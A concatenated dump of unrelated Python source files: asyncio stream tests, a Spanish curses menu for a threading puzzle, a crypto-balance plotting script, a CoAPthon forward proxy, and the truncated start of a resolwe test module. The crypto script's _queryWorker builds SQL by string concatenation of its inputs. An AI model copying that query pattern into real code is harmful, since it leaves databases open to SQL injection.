start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path,
loop=self.loop)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
reader, writer = await asyncio.open_unix_connection(
path, loop=self.loop)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(asyncio.Task(client(path),
loop=self.loop))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# StreamReader's limit so that twice it is less than the size
# of the data writter. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
reader = asyncio.StreamReader(loop=self.loop, limit=1,
_asyncio_internal=True)
protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop,
_asyncio_internal=True)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(*args,
pass_fds={wfd},
loop=self.loop)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(reader.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader(_asyncio_internal=True)
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader, _asyncio_internal=True)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('localhost', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
reader, writer = await asyncio.open_connection(
host, port, loop=self.loop)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123,
_asyncio_internal=True)
self.assertEqual("<StreamReader limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<StreamReader waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader transport=<Transport>>", repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_del_stream_before_sock_closing(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address, loop=self.loop))
sock = wr.get_extra_info('socket')
self.assertNotEqual(sock.fileno(), -1)
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
# drop refs to reader/writer
del rd
del wr
gc.collect()
# make a chance to close the socket
test_utils.run_briefly(self.loop)
self.assertEqual(1, len(messages))
self.assertEqual(sock.fileno(), -1)
self.assertEqual(1, len(messages))
self.assertEqual('An open stream object is being garbage '
'collected; call "stream.close()" explicitly.',
messages[0]['message'])
def test_del_stream_before_connection_made(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
rd = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
pr = asyncio.StreamReaderProtocol(rd, loop=self.loop,
_asyncio_internal=True)
del rd
gc.collect()
tr, _ = self.loop.run_until_complete(
self.loop.create_connection(
lambda: pr, *httpd.address))
sock = tr.get_extra_info('socket')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(1, len(messages))
self.assertEqual('An open stream was garbage collected prior to '
'establishing network connection; '
'call "stream.close()" explicitly.',
messages[0]['message'])
def test_async_writer_api(self):
async def inner(httpd):
rd, wr = await asyncio.open_connection(*httpd.address)
await wr.write(b'GET / HTTP/1.0\r\n\r\n')
data = await rd.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await rd.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
await wr.close()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api(self):
async def inner(httpd):
rd, wr = await asyncio.open_connection(*httpd.address)
await wr.write(b'GET / HTTP/1.0\r\n\r\n')
data = await rd.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await rd.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
wr.close()
with self.assertRaises(ConnectionResetError):
await wr.write(b'data')
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
# See http://bugs.python.org/issue35065
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address,
loop=self.loop))
f = wr.close()
self.loop.run_until_complete(f)
assert rd.at_eof()
f = rd.read()
data = self.loop.run_until_complete(f)
assert data == b''
self.assertEqual(messages, [])
def test_stream_reader_create_warning(self):
with self.assertWarns(DeprecationWarning):
asyncio.StreamReader(loop=self.loop)
def test_stream_reader_protocol_create_warning(self):
reader = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
with self.assertWarns(DeprecationWarning):
asyncio.StreamReaderProtocol(reader, loop=self.loop)
def test_stream_writer_create_warning(self):
reader = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
proto = asyncio.StreamReaderProtocol(reader, loop=self.loop,
_asyncio_internal=True)
with self.assertWarns(DeprecationWarning):
asyncio.StreamWriter('transport', proto, reader, self.loop)
if __name__ == '__main__':
unittest.main()
|
interfaz.py | # -*- coding: utf-8 -*-
import curses
from time import sleep
import proyecto as pyt
import config as c
from threading import Semaphore, Thread
def menu():
#Se inicia pantalla, se obtienen dimensiones de la consola
scr = curses.initscr()
curses.noecho()
dims = scr.getmaxyx()
hilosCorriendo = False
q = -1
while q != 113 and q != 81:
scr.nodelay(1)
q = scr.getch()
scr.clear()
#Pantalla de titulo
scr.addstr(1,dims[1]-24, 'Presione \'q\' para salir')
scr.addstr(2,(dims[1]-39)//2,' _____ _ _ __ ')
scr.addstr(3,(dims[1]-39)//2,'| ___| | | | / _| ')
scr.addstr(4,(dims[1]-39)//2,'| |__ | | | |__ _ _| |_ ___ _ __ ')
scr.addstr(5,(dims[1]-39)//2,'| __|| | | \'_ \\| | | | _/ _ \\| \'_ \\ ')
scr.addstr(6,(dims[1]-39)//2,'| |___| | | |_) | |_| | || (_) | | | |')
scr.addstr(7,(dims[1]-39)//2,'\\____/|_| |_.__/ \\__,_|_| \\___/|_| |_|')
scr.addstr(8,(dims[1]-50)//2,' _ _ \n')
scr.addstr(9,(dims[1]-50)//2,' | | | | \n')
scr.addstr(10,(dims[1]-50)//2,' ___ _ __ ___| | | |_ _ __ ___ _ __ ___ \n')
scr.addstr(11,(dims[1]-50)//2,' / _ \\ \'_ \\ / _ \\ | | __| \'__/ _ \\| \'_ \\ / _ \\ \n')
scr.addstr(12,(dims[1]-50)//2,'| __/ | | | | __/ | | |_| | | (_) | | | | (_) |\n')
scr.addstr(13,(dims[1]-50)//2,' \\___|_| |_| \\___|_| \\__|_| \\___/|_| |_|\\___/ \n')
scr.addstr(16,(dims[1]//2)-15,'1. El problema')
scr.addstr(18,(dims[1]//2)-15,"""2. Ejecución visual
Opcion:""")
scr.refresh()
s = -1
#1. El problema
if q == 49:
scr.clear()
scr.nodelay(1)
#Mostrar la descripcion del problema hasta salir.
while s != 115 and s != 83:
scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
scr.addstr(2, (dims[1]-20)//2,'El bufón en el trono')
scr.addstr(3, 2,"""
El bufón de la corte tiene un pasatiempo secreto:
le gusta disfrazarse del rey y sentarse en el trono.
Sin embargo, solo puede hacer esto cuando no hay nadie presente
en la sala: ni el rey ni los cortesanos.
-El bufón aprovechará cualquier oportunidad que tenga para darse este lujo.
-El rey suele ausentarse por periodos considerables de tiempo,
mientras que varios cortesanos pueden entrar y salir de la sala.
-Si el rey llega mientras el bufón está sentado,
el bufón tiene que levantarse inmediatamente y cederle el trono.
-Si un cortesano llega mientras el bufón está sentado,
pensará que es el rey y no lo molestará.
-El bufón también es impaciente, por lo que si cuenta que ya pasaron 10 cortesanos
por la sala y no lo han dejado a solas con el trono, aún en presencia del rey, cerrará maliciosamente
la puerta de los cortesanos y esperará a que todos se vayan.
-Los cortesanos tendrán que esperar afuera. Desafortunadamente,
cuando hay 5 cortesanos esperando, éstos se ponen impacientes,
y el bufón tiene abrirles la puerta, aún si no está sentado.""")
scr.nodelay(0)
s = scr.getch()
scr.clear()
#2. Ejecucion visual
elif q == 50:
scr.clear()
scr.nodelay(1)
#Lista de los últimos 10 eventos
textoEntrante = [""]*10
#Se crean y se inician los hilos la primera vez que se entra aquí
if not hilosCorriendo:
hiloRey = Thread(target = pyt.rey, args = [])
hiloBufon = Thread(target = pyt.bufon, args = [])
hiloCortesanos = Thread(target = pyt.llegadaCortesanos, args = [])
hiloRey.start()
hiloBufon.start()
hiloCortesanos.start()
hilosCorriendo = True
#Se abre el torniquete para generar cortesanos
c.pausa.release()
while s != 115 and s != 83:
s = scr.getch()
#Se espera a que un hilo avise de una actualización
c.sigHilos.acquire()
scr.clear()
#Se visualiza el estado actual del escenario
scr.addstr(1, dims[1]-33,'Presiona \'s\' parar salir al menú')
scr.addstr(2,(dims[1]-20)//2,"El bufón en el trono")
scr.addstr(4,(dims[1]-23)//2,c.grafico[0])
scr.addstr(5,(dims[1]-23)//2,c.grafico[1])
scr.addstr(6,(dims[1]-23)//2,c.grafico[2])
scr.addstr(7,(dims[1]-23)//2,c.grafico[3])
scr.addstr(8,(dims[1]-23)//2,c.grafico[4])
scr.addstr(9,(dims[1]-23)//2,c.grafico[5])
scr.addstr(10,(dims[1]-23)//2,c.grafico[6])
scr.addstr(12,(dims[1]-31)//2,"B-Bufon C-Cortesano K-Rey")
#Se actualiza la lista de eventos recientes, y se muestra
for i in reversed(range(9)):
textoEntrante[i+1] = textoEntrante[i]
textoEntrante[0] = c.grafico[7]
scr.addstr(14,(dims[1]-66)//2,textoEntrante[9])
scr.addstr(15,(dims[1]-66)//2,textoEntrante[8])
scr.addstr(16,(dims[1]-66)//2,textoEntrante[7])
scr.addstr(17,(dims[1]-66)//2,textoEntrante[6])
scr.addstr(18,(dims[1]-66)//2,textoEntrante[5])
scr.addstr(19,(dims[1]-66)//2,textoEntrante[4])
scr.addstr(20,(dims[1]-66)//2,textoEntrante[3])
scr.addstr(21,(dims[1]-66)//2,textoEntrante[2])
scr.addstr(22,(dims[1]-66)//2,textoEntrante[1])
scr.addstr(23,(dims[1]-66)//2,textoEntrante[0])
scr.refresh()
sleep(0.25)
#Se señaliza al actor que ya se termino de actualizar la pantalla.
c.sigInterfaz.release()
#Se cierra el torniquete para detener la generación de cortesanos
c.pausa.acquire()
sleep(0.05)
curses.endwin()
menu() |
cryptoAnalyzer.py | #**************************************************************
# Created by: Adam Musciano
# Description: Monitors balances of different cryptocurrencies
#
#
#*************************************************************
# mysql find balance and time for crypto > select amount_usd, insertedTime from balances where crypto="ethereum" ORDER BY id ASC
import json
import datetime
from time import sleep
import _mysql
import pandas as pd
import numpy as np
import plotly.plotly as py
import plotly.graph_objs as go
import plotly
import threading
class CryptoAnalyzer():
"""Creates graphs and spots trends of various crypto's using retrieved data from balanceLogger """
__dbPass= ""
__dbUser= ""
__dbHost= ""
__dbName= ""
__plotlyUsername= ""
__plotlyKey = ""
isOnline= False
def __loadFiles(self):
"""Loads data from config.json
"""
with open('../config/config.json', mode='r') as config_file:#load all config options
config= json.load(config_file)
plotly_info = config['plotly']
self.__plotlyUsername= plotly_info['username']
self.__plotlyKey = plotly_info['key']
database_info= config['database']
self.__dbPass= database_info['dbpassword']
self.__dbUser= database_info['dbuser']
self.__dbHost= database_info['dbhost']
self.__dbName= database_info['dbname']
def __toUnixTime(self, dt):
epoch = datetime.datetime.utcfromtimestamp(0)
return (dt - epoch).total_seconds() * 1000
def _queryWorker(self, cryptoName, lowLimDate, upLimDate, data):
query= 'SELECT amount_usd, insertedTime FROM balances WHERE crypto="'+cryptoName+'" AND insertedTime BETWEEN "'+lowLimDate+'" AND "'+upLimDate+'";'
db=_mysql.connect(host=self.__dbHost, user=self.__dbUser, passwd=self.__dbPass, db=self.__dbName)
print("Querying "+cryptoName)
db.query(query)
queryResult= db.store_result()
num_rows=queryResult.num_rows()
amount=[]
time=[]
for x in range(0,num_rows) :
fetched= queryResult.fetch_row(how=1)[0]
print("Worker["+cryptoName+"]"+str(x)+"/"+str(num_rows-1))
timestamp_split= str(fetched["insertedTime"].decode('utf-8')).split()
date_split = timestamp_split[0].split("-")
time_split = timestamp_split[1].split(":")
entry_year=int(date_split[0])
entry_month= int(date_split[1])
entry_day= int( date_split[2])
entry_hour=int(time_split[0])
entry_minute=int(time_split[1])
time.append(datetime.datetime(year=entry_year, month = entry_month, day= entry_day, hour= entry_hour, minute= entry_minute ))
amount.append(float(fetched["amount_usd"]))
data.append(go.Scatter(x= time,y= amount, name=cryptoName))
db.commit();
db.close();
def getAmountInRange(self, cryptoNames, lowLimDate, upLimDate):
"""Creates graphs of amount of crypto in fiat over time,saves to plotly account """
#query= 'SELECT amount_usd, insertedTime FROM balances WHERE crypto = "'+cryptoName+'" ORDER BY id ASC;'
data= []
threads= []
for cryptoName in cryptoNames:
t = threading.Thread(target=self._queryWorker, args=(cryptoName, lowLimDate, upLimDate, data))
threads.append(t)
t.start()
for thread in threads:
thread.join()
timestamp_split= str(lowLimDate).split()
date_split = timestamp_split[0].split("-")
time_split = timestamp_split[1].split(":")
entry_year=int(date_split[0])
entry_month= int(date_split[1])
entry_day= int( date_split[2])
entry_hour=int(time_split[0])
entry_minute=int(time_split[1])
minTime= datetime.datetime(year=entry_year, month = entry_month, day= entry_day, hour= entry_hour, minute= entry_minute )
timestamp_split= str(upLimDate).split()
date_split = timestamp_split[0].split("-")
time_split = timestamp_split[1].split(":")
entry_year=int(date_split[0])
entry_month= int(date_split[1])
entry_day= int( date_split[2])
entry_hour=int(time_split[0])
entry_minute=int(time_split[1])
maxTime= datetime.datetime(year=entry_year, month = entry_month, day= entry_day, hour= entry_hour, minute= entry_minute )
print("Threads complete")
print("Plotting...")
layout = go.Layout( title="Portfolio Balance Over Time",
xaxis = dict(
range = [self.__toUnixTime(minTime),
self.__toUnixTime(maxTime)],
title= "Time",
type= "date"
),
yaxis = dict(
title= "Balance USD"
)
)
fig = go.Figure(data= data, layout = layout)
filename=str(datetime.datetime.now().strftime('%m-%d-%Y_%H-%M'))
if(self.isOnline):
result = py.iplot(fig, filename=str(filename+"_portfolio_balances"))
else:
result = plotly.offline.plot(fig, filename=str(filename+"_portfolio_balances.html"))
return result
def getTotalFiat(self):
pass#return self.total_in_fiat
def __init__(self, online= False):
self.__loadFiles()
self.isOnline= online
if (self.isOnline):
plotly.tools.set_credentials_file(username=self.__plotlyUsername, api_key=self.__plotlyKey)
if __name__ == "__main__":
c = CryptoAnalyzer()
cryptos= ['ethereum', 'bitcoin', 'omisego','unikoin-gold','basic-attention-token', 'neo','xenon','viuly' ]
print(c.getAmountInRange(cryptos,"2017-12-20 1:00:00:00", "2017-12-25 23:00:00:00"))
|
coap.py | import logging
import random
import socket
import struct
import threading
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.cachelayer import CacheLayer
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
from coapthon.utils import Tree
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
"""
Implementation of the Forward Proxy
"""
def __init__(self, server_address, multicast=False, starting_mid=None, cache=False, sock=None):
"""
Initialize the Forward Proxy.
:param server_address: Server address for incoming connections
:param multicast: if the ip is a multicast address
:param starting_mid: used for testing purposes
:param cache: if a cache must be used
:param sock: if a socket has been created externally, it can be used directly
"""
self.stopped = threading.Event()
self.stopped.clear()
self.to_be_stopped = []
self.purge = threading.Thread(target=self.purge)
self.purge.start()
self.cache_enable = cache
self._messageLayer = MessageLayer(starting_mid)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
if self.cache_enable:
self._cacheLayer = CacheLayer(defines.FORWARD_PROXY)
else:
self._cacheLayer = None
self._forwardLayer = ForwardLayer(self)
self.resourceLayer = ResourceLayer(self)
# Resource directory
root = Resource('root', self, visible=False, observable=False, allow_children=True)
root.path = '/'
self.root = Tree()
self.root["/"] = root
self._serializer = None
self.server_address = server_address
self.multicast = multicast
addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
if sock is not None:
# Use given socket, could be a DTLS socket
self._socket = sock
elif self.multicast: # pragma: no cover
# Create a socket
# self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 255)
# self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
# Join group
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(('', self.server_address[1]))
mreq = struct.pack("4sl", socket.inet_aton(defines.ALL_COAP_NODES), socket.INADDR_ANY)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
else:
# Bugfix for Python 3.6 for Windows ... missing IPPROTO_IPV6 constant
if not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(('', self.server_address[1]))
addrinfo_multicast = socket.getaddrinfo(defines.ALL_COAP_NODES_IPV6, 5683)[0]
group_bin = socket.inet_pton(socket.AF_INET6, addrinfo_multicast[4][0])
mreq = group_bin + struct.pack('@I', 0)
self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(self.server_address)
def purge(self):
"""
Clean old transactions
"""
while not self.stopped.isSet():
self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
self._messageLayer.purge()
def listen(self, timeout=10):
"""
Listen for incoming messages. Timeout is used to check if the server must be switched off.
:param timeout: Socket Timeout in seconds
"""
self._socket.settimeout(float(timeout))
while not self.stopped.isSet():
try:
data, client_address = self._socket.recvfrom(4096)
except socket.timeout:
continue
try:
# Start a new thread not to block other requests
args = ((data, client_address), )
t = threading.Thread(target=self.receive_datagram, args=args)
t.daemon = True
t.start()
except RuntimeError:
logging.exception("Exception with Executor")
logging.debug("closing socket")
self._socket.close()
def close(self):
"""
Stop the server.
"""
logger.info("Stop server")
self.stopped.set()
for event in self.to_be_stopped:
event.set()
# self._socket.close()
def receive_datagram(self, args):
"""
Handle messages coming from the udp socket.
:param args: (data, client_address)
"""
data, client_address = args
logging.debug("receiving datagram")
try:
host, port = client_address
except ValueError:
host, port, tmp1, tmp2 = client_address
client_address = (host, port)
serializer = Serializer()
message = serializer.deserialize(data, client_address)
if isinstance(message, int):
logger.error("receive_datagram - BAD REQUEST")
rst = Message()
rst.destination = client_address
rst.type = defines.Types["RST"]
rst.code = message
self.send_datagram(rst)
return
logger.info("receive_datagram - " + str(message))
if isinstance(message, Request):
transaction = self._messageLayer.receive_request(message)
if transaction.request.duplicated and transaction.completed:
logger.debug("message duplicated, transaction completed")
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
elif transaction.request.duplicated and not transaction.completed:
logger.debug("message duplicated, transaction NOT completed")
self._send_ack(transaction)
return
transaction.separate_timer = self._start_separate_timer(transaction)
transaction = self._blockLayer.receive_request(transaction)
if transaction.block_transfer:
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
transaction = self._observeLayer.receive_request(transaction)
"""
call to the cache layer to check if there's a cached response for the request
if not, call the forward layer
"""
if self._cacheLayer is not None:
transaction = self._cacheLayer.receive_request(transaction)
if transaction.cacheHit is False:
logging.debug(transaction.request)
transaction = self._forwardLayer.receive_request(transaction)
logging.debug(transaction.response)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._cacheLayer.send_response(transaction)
else:
transaction = self._forwardLayer.receive_request(transaction)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
if transaction.response is not None:
if transaction.response.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.response)
self.send_datagram(transaction.response)
elif isinstance(message, Message):
transaction = self._messageLayer.receive_empty(message)
if transaction is not None:
transaction = self._blockLayer.receive_empty(message, transaction)
self._observeLayer.receive_empty(message, transaction)
else: # is Response
logger.error("Received response from %s", message.source)
def send_datagram(self, message):
"""
Send a message through the udp socket.
:type message: Message
:param message: the message to send
"""
if not self.stopped.isSet():
host, port = message.destination
logger.info("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
if message.observe is not None:
self._observeLayer.remove_subscriber(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def _start_separate_timer(self, transaction):
"""
Start a thread to handle separate mode.
:type transaction: Transaction
:param transaction: the transaction that is in processing
:rtype : the Timer object
"""
t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
t.start()
return t
@staticmethod
def _stop_separate_timer(timer):
"""
Stop the separate Thread if an answer has been already provided to the client.
:param timer: The Timer object
"""
timer.cancel()
def _send_ack(self, transaction):
"""
Sends an ACK message for the request.
:param transaction: the transaction that owns the request
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.request.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
self.send_datagram(ack)
|
test_executors.py | # pylint: disable=missing-docstring
import os
import subprocess
import threading
import unittest
from contextlib import suppress
from pathlib import Path
from time import sleep
from unittest import mock
from asgiref.sync import async_to_sync
from django.conf import settings
from django.test import override_settings
from guardian.shortcuts import assign_perm
from resolwe.flow.executors.prepare import BaseFlowExecutorPreparer
from resolwe.flow.managers import manager
from resolwe.flow.managers.utils import disable_auto_calls
from resolwe.flow.models import Data, DataDependency, Process, Worker
from resolwe.test import (
ProcessTestCase,
TestCase,
tag_process,
with_docker_executor,
with_null_executor,
)
PROCESSES_DIR = os.path.join(os.path.dirname(__file__), "processes")
DESCRIPTORS_DIR = os.path.join(os.path.dirname(__file__), "descriptors")
class GetToolsTestCase(TestCase):
@mock.patch("resolwe.flow.utils.apps")
@mock.patch("resolwe.flow.utils.os")
@mock.patch("resolwe.flow.utils.settings")
def test_get_tools_paths(self, settings_mock, os_mock, apps_mock):
